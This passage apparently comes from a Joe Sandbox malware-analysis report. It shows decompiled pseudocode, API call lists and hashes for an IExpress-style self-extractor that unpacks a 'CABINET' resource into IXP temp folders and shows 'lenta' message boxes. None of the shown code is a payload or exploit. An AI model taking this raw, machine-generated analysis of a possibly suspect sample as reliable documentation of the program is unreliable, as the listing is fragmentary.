                                                                                                                                                                                                                                                0x001059d6
                                                                                                                                                                                                                                                0x00105c05
                                                                                                                                                                                                                                                0x00105c14
                                                                                                                                                                                                                                                0x00105c14

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 001059A8
                                                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNELBASE(?), ref: 001059AF
                                                                                                                                                                                                                                                • GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00105A13
                                                                                                                                                                                                                                                • MulDiv.KERNEL32(?,?,00000400), ref: 00105A40
                                                                                                                                                                                                                                                • GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00105A64
                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00105A7C
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00105A98
                                                                                                                                                                                                                                                • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00105AA5
                                                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00105BFC
                                                                                                                                                                                                                                                  • Part of subcall function 001044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00104518
                                                                                                                                                                                                                                                  • Part of subcall function 001044B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00104554
                                                                                                                                                                                                                                                  • Part of subcall function 00106285: GetLastError.KERNEL32(00105BBC), ref: 00106285
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 4237285672-0
                                                                                                                                                                                                                                                • Opcode ID: 2adaf1847c79a25c82d3e7bfc39a43bdccbf647f44f7d130ec6dd1752e59e666
                                                                                                                                                                                                                                                • Instruction ID: e45a4e6f8bf3b25855445e6c8b8cc5c4a4e70382b6b4947422afb3082b10d098
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2adaf1847c79a25c82d3e7bfc39a43bdccbf647f44f7d130ec6dd1752e59e666
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6F71A0B1A0020CAFEB259B60CC85BFB77AEEB48344F5440A9F585D3581DBB09E848F60
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 374 104fe0-10501a call 10468f FindResourceA LoadResource LockResource 377 105020-105027 374->377 378 105161-105163 374->378 379 105057-10505e call 104efd 377->379 380 105029-105051 GetDlgItem ShowWindow GetDlgItem ShowWindow 377->380 383 105060-105077 call 1044b9 379->383 384 10507c-1050b4 379->384 380->379 388 105107-10510e 383->388 389 1050b6-1050da 384->389 390 1050e8-105104 call 1044b9 384->390 391 105110-105117 FreeResource 388->391 392 10511d-10511f 388->392 401 105106 389->401 402 1050dc 389->402 390->401 391->392 394 105121-105127 392->394 395 10513a-105141 392->395 394->395 398 105129-105135 call 1044b9 394->398 399 105143-10514a 395->399 400 10515f 395->400 398->395 399->400 404 10514c-105159 SendMessageA 399->404 400->378 401->388 405 1050e3-1050e6 402->405 404->400 405->390 405->401
                                                                                                                                                                                                                                                C-Code - Quality: 77%
                                                                                                                                                                                                                                                			E00104FE0(void* __edi, void* __eflags) {
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* _t8;
                                                                                                                                                                                                                                                				struct HWND__* _t9;
                                                                                                                                                                                                                                                				int _t10;
                                                                                                                                                                                                                                                				void* _t12;
                                                                                                                                                                                                                                                				struct HWND__* _t24;
                                                                                                                                                                                                                                                				struct HWND__* _t27;
                                                                                                                                                                                                                                                				intOrPtr _t29;
                                                                                                                                                                                                                                                				void* _t33;
                                                                                                                                                                                                                                                				int _t34;
                                                                                                                                                                                                                                                				CHAR* _t36;
                                                                                                                                                                                                                                                				int _t37;
                                                                                                                                                                                                                                                				intOrPtr _t47;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t33 = __edi;
                                                                                                                                                                                                                                                				_t36 = "CABINET";
                                                                                                                                                                                                                                                				 *0x109144 = E0010468F(_t36, 0, 0);
                                                                                                                                                                                                                                                				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
                                                                                                                                                                                                                                                				 *0x109140 = _t8;
                                                                                                                                                                                                                                                				if(_t8 == 0) {
                                                                                                                                                                                                                                                					return _t8;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t9 =  *0x108584; // 0x0
                                                                                                                                                                                                                                                				if(_t9 != 0) {
                                                                                                                                                                                                                                                					ShowWindow(GetDlgItem(_t9, 0x842), 0);
                                                                                                                                                                                                                                                					ShowWindow(GetDlgItem( *0x108584, 0x841), 5); // executed
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t10 = E00104EFD(0, 0); // executed
                                                                                                                                                                                                                                                				if(_t10 != 0) {
                                                                                                                                                                                                                                                					__imp__#20(E00104CA0, E00104CC0, E00104980, E00104A50, E00104AD0, E00104B60, E00104BC0, 1, 0x109148, _t33);
                                                                                                                                                                                                                                                					_t34 = _t10;
                                                                                                                                                                                                                                                					if(_t34 == 0) {
                                                                                                                                                                                                                                                						L8:
                                                                                                                                                                                                                                                						_t29 =  *0x109148; // 0x0
                                                                                                                                                                                                                                                						_t24 =  *0x108584; // 0x0
                                                                                                                                                                                                                                                						E001044B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                                						_t37 = 0;
                                                                                                                                                                                                                                                						L9:
                                                                                                                                                                                                                                                						goto L10;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					__imp__#22(_t34, "*MEMCAB", 0x101140, 0, E00104CD0, 0, 0x109140); // executed
                                                                                                                                                                                                                                                					_t37 = _t10;
                                                                                                                                                                                                                                                					if(_t37 == 0) {
                                                                                                                                                                                                                                                						goto L9;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					__imp__#23(_t34); // executed
                                                                                                                                                                                                                                                					if(_t10 != 0) {
                                                                                                                                                                                                                                                						goto L9;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					goto L8;
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					_t27 =  *0x108584; // 0x0
                                                                                                                                                                                                                                                					E001044B9(_t27, 0x4ba, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                                					_t37 = 0;
                                                                                                                                                                                                                                                					L10:
                                                                                                                                                                                                                                                					_t12 =  *0x109140; // 0x0
                                                                                                                                                                                                                                                					if(_t12 != 0) {
                                                                                                                                                                                                                                                						FreeResource(_t12);
                                                                                                                                                                                                                                                						 *0x109140 = 0;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					if(_t37 == 0) {
                                                                                                                                                                                                                                                						_t47 =  *0x1091d8; // 0x0
                                                                                                                                                                                                                                                						if(_t47 == 0) {
                                                                                                                                                                                                                                                							E001044B9(0, 0x4f8, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					if(( *0x108a38 & 0x00000001) == 0 && ( *0x109a34 & 0x00000001) == 0) {
                                                                                                                                                                                                                                                						SendMessageA( *0x108584, 0xfa1, _t37, 0);
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					return _t37;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                			}

















                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001046A0
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: SizeofResource.KERNEL32(00000000,00000000,?,00102D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001046A9
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001046C3
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: LoadResource.KERNEL32(00000000,00000000,?,00102D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001046CC
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: LockResource.KERNEL32(00000000,?,00102D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001046D3
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: memcpy_s.MSVCRT ref: 001046E5
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001046EF
                                                                                                                                                                                                                                                • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00104FFE
                                                                                                                                                                                                                                                • LoadResource.KERNEL32(00000000,00000000), ref: 00105006
                                                                                                                                                                                                                                                • LockResource.KERNEL32(00000000), ref: 0010500D
                                                                                                                                                                                                                                                • GetDlgItem.USER32(00000000,00000842), ref: 00105030
                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 00105037
                                                                                                                                                                                                                                                • GetDlgItem.USER32(00000841,00000005), ref: 0010504A
                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 00105051
                                                                                                                                                                                                                                                • FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00105111
                                                                                                                                                                                                                                                • SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00105159
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                                                                                                                                                • String ID: *MEMCAB$CABINET
                                                                                                                                                                                                                                                • API String ID: 1305606123-2642027498
                                                                                                                                                                                                                                                • Opcode ID: 891c78d950ffcad1148732046d191d3af2b2e6a85481de588979a65d151131c9
                                                                                                                                                                                                                                                • Instruction ID: cb461f454ae2cb9eee6ebe1d0db30053b9f4e72fa01b4a0250096f0c42e685ec
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 891c78d950ffcad1148732046d191d3af2b2e6a85481de588979a65d151131c9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9931C6F0780706BBE7205B61ADC9F67365DBB08755F044024FBC2A29E2DFF99C808A65
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 94%
                                                                                                                                                                                                                                                			E001044B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v64;
                                                                                                                                                                                                                                                				char _v576;
                                                                                                                                                                                                                                                				void* _v580;
                                                                                                                                                                                                                                                				struct HWND__* _v584;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t34;
                                                                                                                                                                                                                                                				void* _t37;
                                                                                                                                                                                                                                                				signed int _t39;
                                                                                                                                                                                                                                                				intOrPtr _t43;
                                                                                                                                                                                                                                                				signed int _t44;
                                                                                                                                                                                                                                                				signed int _t49;
                                                                                                                                                                                                                                                				signed int _t52;
                                                                                                                                                                                                                                                				void* _t54;
                                                                                                                                                                                                                                                				intOrPtr _t55;
                                                                                                                                                                                                                                                				intOrPtr _t58;
                                                                                                                                                                                                                                                				intOrPtr _t59;
                                                                                                                                                                                                                                                				int _t64;
                                                                                                                                                                                                                                                				void* _t66;
                                                                                                                                                                                                                                                				intOrPtr* _t67;
                                                                                                                                                                                                                                                				signed int _t69;
                                                                                                                                                                                                                                                				intOrPtr* _t73;
                                                                                                                                                                                                                                                				intOrPtr* _t76;
                                                                                                                                                                                                                                                				intOrPtr* _t77;
                                                                                                                                                                                                                                                				void* _t80;
                                                                                                                                                                                                                                                				void* _t81;
                                                                                                                                                                                                                                                				void* _t82;
                                                                                                                                                                                                                                                				intOrPtr* _t84;
                                                                                                                                                                                                                                                				void* _t85;
                                                                                                                                                                                                                                                				signed int _t89;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t75 = __edx;
                                                                                                                                                                                                                                                				_t34 =  *0x108004; // 0xb5a2e1bc
                                                                                                                                                                                                                                                				_v8 = _t34 ^ _t89;
                                                                                                                                                                                                                                                				_v584 = __ecx;
                                                                                                                                                                                                                                                				_t83 = "LoadString() Error.  Could not load string resource.";
                                                                                                                                                                                                                                                				_t67 = _a4;
                                                                                                                                                                                                                                                				_t69 = 0xd;
                                                                                                                                                                                                                                                				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                                                                                                                                                                                                                                                				_t80 = _t83 + _t69 + _t69;
                                                                                                                                                                                                                                                				_v580 = _t37;
                                                                                                                                                                                                                                                				asm("movsb");
                                                                                                                                                                                                                                                				if(( *0x108a38 & 0x00000001) != 0) {
                                                                                                                                                                                                                                                					_t39 = 1;
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					_v576 = 0;
                                                                                                                                                                                                                                                					LoadStringA( *0x109a3c, _t75,  &_v576, 0x200);
                                                                                                                                                                                                                                                					if(_v576 != 0) {
                                                                                                                                                                                                                                                						_t73 =  &_v576;
                                                                                                                                                                                                                                                						_t16 = _t73 + 1; // 0x1
                                                                                                                                                                                                                                                						_t75 = _t16;
                                                                                                                                                                                                                                                						do {
                                                                                                                                                                                                                                                							_t43 =  *_t73;
                                                                                                                                                                                                                                                							_t73 = _t73 + 1;
                                                                                                                                                                                                                                                						} while (_t43 != 0);
                                                                                                                                                                                                                                                						_t84 = _v580;
                                                                                                                                                                                                                                                						_t74 = _t73 - _t75;
                                                                                                                                                                                                                                                						if(_t84 == 0) {
                                                                                                                                                                                                                                                							if(_t67 == 0) {
                                                                                                                                                                                                                                                								_t27 = _t74 + 1; // 0x2
                                                                                                                                                                                                                                                								_t83 = _t27;
                                                                                                                                                                                                                                                								_t44 = LocalAlloc(0x40, _t83);
                                                                                                                                                                                                                                                								_t80 = _t44;
                                                                                                                                                                                                                                                								if(_t80 == 0) {
                                                                                                                                                                                                                                                									goto L6;
                                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                                									_t75 = _t83;
                                                                                                                                                                                                                                                									_t74 = _t80;
                                                                                                                                                                                                                                                									E00101680(_t80, _t83,  &_v576);
                                                                                                                                                                                                                                                									goto L23;
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                                								_t76 = _t67;
                                                                                                                                                                                                                                                								_t24 = _t76 + 1; // 0x1
                                                                                                                                                                                                                                                								_t85 = _t24;
                                                                                                                                                                                                                                                								do {
                                                                                                                                                                                                                                                									_t55 =  *_t76;
                                                                                                                                                                                                                                                									_t76 = _t76 + 1;
                                                                                                                                                                                                                                                								} while (_t55 != 0);
                                                                                                                                                                                                                                                								_t25 = _t76 - _t85 + 0x64; // 0x65
                                                                                                                                                                                                                                                								_t83 = _t25 + _t74;
                                                                                                                                                                                                                                                								_t44 = LocalAlloc(0x40, _t25 + _t74);
                                                                                                                                                                                                                                                								_t80 = _t44;
                                                                                                                                                                                                                                                								if(_t80 == 0) {
                                                                                                                                                                                                                                                									goto L6;
                                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                                									E0010171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                                                                									goto L23;
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							_t77 = _t67;
                                                                                                                                                                                                                                                							_t18 = _t77 + 1; // 0x1
                                                                                                                                                                                                                                                							_t81 = _t18;
                                                                                                                                                                                                                                                							do {
                                                                                                                                                                                                                                                								_t58 =  *_t77;
                                                                                                                                                                                                                                                								_t77 = _t77 + 1;
                                                                                                                                                                                                                                                							} while (_t58 != 0);
                                                                                                                                                                                                                                                							_t75 = _t77 - _t81;
                                                                                                                                                                                                                                                							_t82 = _t84 + 1;
                                                                                                                                                                                                                                                							do {
                                                                                                                                                                                                                                                								_t59 =  *_t84;
                                                                                                                                                                                                                                                								_t84 = _t84 + 1;
                                                                                                                                                                                                                                                							} while (_t59 != 0);
                                                                                                                                                                                                                                                							_t21 = _t74 + 0x64; // 0x65
                                                                                                                                                                                                                                                							_t83 = _t21 + _t84 - _t82 + _t75;
                                                                                                                                                                                                                                                							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
                                                                                                                                                                                                                                                							_t80 = _t44;
                                                                                                                                                                                                                                                							if(_t80 == 0) {
                                                                                                                                                                                                                                                								goto L6;
                                                                                                                                                                                                                                                							} else {
                                                                                                                                                                                                                                                								_push(_v580);
                                                                                                                                                                                                                                                								E0010171E(_t80, _t83,  &_v576, _t67);
                                                                                                                                                                                                                                                								L23:
                                                                                                                                                                                                                                                								MessageBeep(_a12);
                                                                                                                                                                                                                                                								if(E0010681F(_t67) == 0) {
                                                                                                                                                                                                                                                									L25:
                                                                                                                                                                                                                                                									_t49 = 0x10000;
                                                                                                                                                                                                                                                								} else {
                                                                                                                                                                                                                                                									_t54 = E001067C9(_t74, _t74);
                                                                                                                                                                                                                                                									_t49 = 0x190000;
                                                                                                                                                                                                                                                									if(_t54 == 0) {
                                                                                                                                                                                                                                                										goto L25;
                                                                                                                                                                                                                                                									}
                                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                                								_t52 = MessageBoxA(_v584, _t80, "lenta", _t49 | _a12 | _a16); // executed
                                                                                                                                                                                                                                                								_t83 = _t52;
                                                                                                                                                                                                                                                								LocalFree(_t80);
                                                                                                                                                                                                                                                								_t39 = _t52;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						if(E0010681F(_t67) == 0) {
                                                                                                                                                                                                                                                							L4:
                                                                                                                                                                                                                                                							_t64 = 0x10010;
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							_t66 = E001067C9(0, 0);
                                                                                                                                                                                                                                                							_t64 = 0x190010;
                                                                                                                                                                                                                                                							if(_t66 == 0) {
                                                                                                                                                                                                                                                								goto L4;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						_t44 = MessageBoxA(_v584,  &_v64, "lenta", _t64);
                                                                                                                                                                                                                                                						L6:
                                                                                                                                                                                                                                                						_t39 = _t44 | 0xffffffff;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return E00106CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
                                                                                                                                                                                                                                                			}



































                                                                                                                                                                                                                                                0x001045e3
                                                                                                                                                                                                                                                0x001045e9
                                                                                                                                                                                                                                                0x001045ed
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001045f3
                                                                                                                                                                                                                                                0x001045fd
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00104602
                                                                                                                                                                                                                                                0x001045ed
                                                                                                                                                                                                                                                0x0010457e
                                                                                                                                                                                                                                                0x0010457e
                                                                                                                                                                                                                                                0x00104580
                                                                                                                                                                                                                                                0x00104580
                                                                                                                                                                                                                                                0x00104583
                                                                                                                                                                                                                                                0x00104583
                                                                                                                                                                                                                                                0x00104585
                                                                                                                                                                                                                                                0x00104586
                                                                                                                                                                                                                                                0x0010458a
                                                                                                                                                                                                                                                0x0010458c
                                                                                                                                                                                                                                                0x0010458f
                                                                                                                                                                                                                                                0x0010458f
                                                                                                                                                                                                                                                0x00104591
                                                                                                                                                                                                                                                0x00104592
                                                                                                                                                                                                                                                0x0010459b
                                                                                                                                                                                                                                                0x0010459e
                                                                                                                                                                                                                                                0x001045a3
                                                                                                                                                                                                                                                0x001045a9
                                                                                                                                                                                                                                                0x001045ad
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001045af
                                                                                                                                                                                                                                                0x001045af
                                                                                                                                                                                                                                                0x001045bf
                                                                                                                                                                                                                                                0x0010462d
                                                                                                                                                                                                                                                0x00104630
                                                                                                                                                                                                                                                0x0010463d
                                                                                                                                                                                                                                                0x0010464e
                                                                                                                                                                                                                                                0x0010464e
                                                                                                                                                                                                                                                0x0010463f
                                                                                                                                                                                                                                                0x00104640
                                                                                                                                                                                                                                                0x00104647
                                                                                                                                                                                                                                                0x0010464c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0010464c
                                                                                                                                                                                                                                                0x00104666
                                                                                                                                                                                                                                                0x0010466d
                                                                                                                                                                                                                                                0x0010466f
                                                                                                                                                                                                                                                0x00104675
                                                                                                                                                                                                                                                0x00104675
                                                                                                                                                                                                                                                0x001045ad
                                                                                                                                                                                                                                                0x00104527
                                                                                                                                                                                                                                                0x0010452e
                                                                                                                                                                                                                                                0x0010453f
                                                                                                                                                                                                                                                0x0010453f
                                                                                                                                                                                                                                                0x00104530
                                                                                                                                                                                                                                                0x00104531
                                                                                                                                                                                                                                                0x00104538
                                                                                                                                                                                                                                                0x0010453d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0010453d
                                                                                                                                                                                                                                                0x00104554
                                                                                                                                                                                                                                                0x0010455a
                                                                                                                                                                                                                                                0x0010455a
                                                                                                                                                                                                                                                0x0010455a
                                                                                                                                                                                                                                                0x00104525
                                                                                                                                                                                                                                                0x0010468c

APIs
• LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00104518
• MessageBoxA.USER32(?,?,lenta,00010010), ref: 00104554
• LocalAlloc.KERNEL32(00000040,00000065), ref: 001045A3
• LocalAlloc.KERNEL32(00000040,00000065), ref: 001045E3
• LocalAlloc.KERNEL32(00000040,00000002), ref: 0010460D
• MessageBeep.USER32(00000000), ref: 00104630
• MessageBoxA.USER32(?,00000000,lenta,00000000), ref: 00104666
• LocalFree.KERNEL32(00000000), ref: 0010466F
  • Part of subcall function 0010681F: GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0010686E
  • Part of subcall function 0010681F: GetSystemMetrics.USER32(0000004A), ref: 001068A7
  • Part of subcall function 0010681F: RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 001068CC
  • Part of subcall function 0010681F: RegQueryValueExA.ADVAPI32(?,00101140,00000000,?,?,0000000C), ref: 001068F4
  • Part of subcall function 0010681F: RegCloseKey.ADVAPI32(?), ref: 00106902
Strings
Memory Dump Source
• Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
• Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
Similarity
• API ID: Local$AllocMessage$BeepCloseFreeLoadMetricsOpenQueryStringSystemValueVersion
• String ID: LoadString() Error. Could not load string resource.$lenta
• API String ID: 3244514340-1000497449
• Opcode ID: 6102901cdb40517ffa2dab09e6d35c89865dbcfedee034541430b0c2548c7f8d
• Instruction ID: c7dcf02e3b778461f22d21a4b0b89bee97f62f4eae7aabbac52098726158ab5d
• Opcode Fuzzy Hash: 6102901cdb40517ffa2dab09e6d35c89865dbcfedee034541430b0c2548c7f8d
• Instruction Fuzzy Hash: E351D6B1900219ABDB219F28DC88BAA7B69EF45310F144195FEC9A7281DBF2DD45CB90
Uniqueness
• Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 95%
                                                                                                                                                                                                                                                			E001053A1(CHAR* __ecx, CHAR* __edx) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v268;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t5;
                                                                                                                                                                                                                                                				long _t13;
                                                                                                                                                                                                                                                				int _t14;
                                                                                                                                                                                                                                                				CHAR* _t20;
                                                                                                                                                                                                                                                				int _t29;
                                                                                                                                                                                                                                                				int _t30;
                                                                                                                                                                                                                                                				CHAR* _t32;
                                                                                                                                                                                                                                                				signed int _t33;
                                                                                                                                                                                                                                                				void* _t34;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t5 =  *0x108004; // 0xb5a2e1bc
                                                                                                                                                                                                                                                				_v8 = _t5 ^ _t33;
                                                                                                                                                                                                                                                				_t32 = __edx;
                                                                                                                                                                                                                                                				_t20 = __ecx;
                                                                                                                                                                                                                                                				_t29 = 0;
                                                                                                                                                                                                                                                				while(1) {
                                                                                                                                                                                                                                                					E0010171E( &_v268, 0x104, "IXP%03d.TMP", _t29);
                                                                                                                                                                                                                                                					_t34 = _t34 + 0x10;
                                                                                                                                                                                                                                                					_t29 = _t29 + 1;
                                                                                                                                                                                                                                                					E00101680(_t32, 0x104, _t20);
                                                                                                                                                                                                                                                					E0010658A(_t32, 0x104,  &_v268); // executed
                                                                                                                                                                                                                                                					RemoveDirectoryA(_t32); // executed
                                                                                                                                                                                                                                                					_t13 = GetFileAttributesA(_t32); // executed
                                                                                                                                                                                                                                                					if(_t13 == 0xffffffff) {
                                                                                                                                                                                                                                                						break;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					if(_t29 < 0x190) {
                                                                                                                                                                                                                                                						continue;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					L3:
                                                                                                                                                                                                                                                					_t30 = 0;
                                                                                                                                                                                                                                                					if(GetTempFileNameA(_t20, "IXP", 0, _t32) != 0) {
                                                                                                                                                                                                                                                						_t30 = 1;
                                                                                                                                                                                                                                                						DeleteFileA(_t32);
                                                                                                                                                                                                                                                						CreateDirectoryA(_t32, 0);
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					L5:
                                                                                                                                                                                                                                                					return E00106CE0(_t30, _t20, _v8 ^ _t33, 0x104, _t30, _t32);
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t14 = CreateDirectoryA(_t32, 0); // executed
                                                                                                                                                                                                                                                				if(_t14 == 0) {
                                                                                                                                                                                                                                                					goto L3;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				_t30 = 1;
                                                                                                                                                                                                                                                				 *0x108a20 = 1;
                                                                                                                                                                                                                                                				goto L5;
                                                                                                                                                                                                                                                			}


















                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 0010171E: _vsnprintf.MSVCRT ref: 00101750
                                                                                                                                                                                                                                                • RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 001053FB
                                                                                                                                                                                                                                                • GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00105402
                                                                                                                                                                                                                                                • GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 0010541F
